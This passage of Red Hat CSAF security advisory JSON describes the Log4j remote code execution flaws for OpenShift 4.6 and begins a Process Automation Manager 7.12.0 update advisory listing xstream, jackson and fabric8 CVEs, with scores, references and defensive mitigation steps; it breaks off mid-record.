"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", 
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T07:50:00+00:00", "details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata 
update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5141" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ] } ], "scores": [ { "cvss_v3": { 
"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A 
flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. 
to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", 
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T07:50:00+00:00", "details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5141" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar 
org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2022_0296
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Red Hat Process Automation Manager.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.12.0 serves as an update to Red Hat Process Automation Manager 7.11.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception (CVE-2020-28491)\n\n* kubernetes-client: fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise (CVE-2021-20218)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.* (CVE-2021-39149)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration (CVE-2021-39145)\n\n* xstream: Arbitrary 
code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration (CVE-2021-39151)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration (CVE-2021-39147)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator (CVE-2021-39148)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.* (CVE-2021-39141)\n\n* xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue (CVE-2021-39146)\n\n* xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue (CVE-2021-39154)\n\n* xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.* (CVE-2021-39144)\n\n* xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl (CVE-2021-39139)\n\n* xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl (CVE-2021-39153)\n\n* xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler (CVE-2021-39140)\n\n* xstream: remote command execution attack by manipulating the processed input stream (CVE-2021-29505)\n\n* xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.* (CVE-2021-39150)\n\n* xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData (CVE-2021-39152)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). 
If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:0296", "url": "https://access.redhat.com/errata/RHSA-2022:0296" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "1923405", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405" }, { "category": "external", "summary": "1930423", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423" }, { "category": "external", "summary": "1966735", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1966735" }, { "category": "external", "summary": "1997763", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997763" }, { "category": "external", "summary": "1997765", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997765" }, { "category": "external", "summary": "1997769", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997769" }, { "category": "external", "summary": "1997772", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997772" }, { "category": "external", "summary": "1997775", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997775" }, { "category": "external", "summary": "1997777", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997777" }, { "category": "external", "summary": "1997779", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997779" }, { "category": "external", "summary": 
"1997781", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997781" }, { "category": "external", "summary": "1997784", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997784" }, { "category": "external", "summary": "1997786", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997786" }, { "category": "external", "summary": "1997791", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997791" }, { "category": "external", "summary": "1997793", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997793" }, { "category": "external", "summary": "1997795", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997795" }, { "category": "external", "summary": "1997801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997801" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0296.json" } ], "title": "Red Hat Security Advisory: Red Hat Process Automation Manager 7.12.0 security update", "tracking": { "current_release_date": "2024-12-12T01:18:36+00:00", "generator": { "date": "2024-12-12T01:18:36+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2022:0296", "initial_release_date": "2022-01-26T15:52:53+00:00", "revision_history": [ { "date": "2022-01-26T15:52:53+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-01-26T15:52:53+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:36+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "RHPAM 7.12.0", "product": { "name": "RHPAM 7.12.0", "product_id": "RHPAM 7.12.0", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7.12" } } } ], "category": 
"product_family", "name": "Red Hat Process Automation Manager" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-28491", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-02-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1930423" } ], "notes": [ { "category": "description", "text": "This affects the package com.fasterxml.jackson.dataformat:jackson-dataformat-cbor from 0 and before 2.11.4, from 2.12.0-rc1 and before 2.12.1. Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception.", "title": "Vulnerability description" }, { "category": "summary", "text": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jackson-dataformat-cbor.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nIn OCP 4.6 the openshift4/ose-logging-elasticsearch6 container delivers the vulnerable version of jackson-dataformat-cbor, but OCP 4.6 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities because it is now in the Maintenance Phase of the support, hence this component is marked as ooss. 
Since the release of OCP 4.7 this component is delivered as part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8 container).\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28491" }, { "category": "external", "summary": "RHBZ#1930423", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28491", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28491" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329" } ], "release_date": "2021-02-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must 
log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception" }, { "acknowledgments": [ { "names": [ "Ivan Bodrov" ] }, { "names": [ "Marc Nuri" ], "organization": "Red Hat", "summary": "This issue was discovered by Red Hat." } ], "cve": "CVE-2021-20218", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-02-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1923405" } ], "notes": [ { "category": "description", "text": "A flaw was found in the fabric8 kubernetes-client in version 4.2.0 and after. This flaw allows a malicious pod/container to cause applications using the fabric8 kubernetes-client `copy` command to extract files outside the working path. 
The highest threat from this vulnerability is to integrity and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform 4 (OCP) there are no plans to maintain the ose-logging-elasticsearch5 container, therefore it has been marked wontfix at this time and maybe fixed in a future update.\n\nRed Hat CodeReady WorkSpaces 2.7.0 does not ship fabric8-kubernetes-client and is therefore not affected by this flaw.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-20218" }, { "category": "external", "summary": "RHBZ#1923405", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-20218", "url": "https://www.cve.org/CVERecord?id=CVE-2021-20218" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218" }, { "category": "external", "summary": "https://github.com/fabric8io/kubernetes-client/issues/2715", "url": "https://github.com/fabric8io/kubernetes-client/issues/2715" } ], "release_date": "2021-01-12T04:35:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, 
